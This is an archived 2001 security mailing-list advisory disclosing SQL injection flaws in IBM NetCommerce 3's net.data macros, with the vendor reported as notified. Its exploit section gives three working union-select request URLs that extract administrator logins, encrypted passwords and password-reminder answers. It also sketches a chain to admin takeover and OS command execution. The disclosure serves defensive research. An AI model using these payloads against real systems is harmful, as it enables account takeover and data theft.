OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: rudi carell (rudicarellHOTMAIL.COM)
Date: Mon Feb 05 2001 - 12:13:10 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    hola friends,

    while i was participating on the openhack contest
    i found a couple of serious security-holes within ibm s
    so called "netcommerce" thing which seems to be a mixture of
    websphere, net.data, servlets, jsp s and db2?

    however..summary:

    class: input validation error
    remote: yes
    local: yes
    vulnerable: ibm netcommerce 3???

    description:

    besides well known websphere-bugs (file thru disclosure and default-admin
    passwords) ...

    the most dangerous bugs result from NON-existing input validation within
    netcommerc s net.data "macros".

    by crafting malformed http-requests it is possible to extract "any"
    netcommerce-database-information.

    combining this method with other default-"netcommerce" funcionality
    (PasswordReset for example) it is possible to take hold of so called
    "store-" or "site-manager"-accounts.

    once youre an nc-administrator you are allowed to use all the admin-tools.

    at this point youre able to up- and download files, issue op-system-commands
    or do any query with the very very high-privileged DB2INST1 account.

    this can lead to a possible take-over of the whole system....

    many "default-macros" are vulnerable to this (classic:-) sort of attack.

    exploit:

    a few examples:

    1) "HowTo find Administrator Accounts"
    http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlogid+as+mestname,0+from+shopper+where+shshtyp+%3d+'A';

    2) "Passwords(crypted)"
    http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlpswd+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';

    3) "Password-Reminders"
    http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shchaans+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';

    of course "orderdspc.d2w" is not the only vulnerable macro .. it s just an
    example. casting between different data-types is possible (read the db2-man
    pages).

    also it should(not proofed) be possible to query other databases.

    vendor status:

    this mail was sent to "ersers.ibm.com" last week.
    (ers = emergency response team)

    nice day,

    rc

    rudicarellhotmail.com
    securityfreefly.com

    <FLAME> due to the very unprofessional(or should i say unfair) system-setup
    of the openhack-servers i was not able to proof the whole concept </FLAME>

    _________________________________________________________________________
    Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.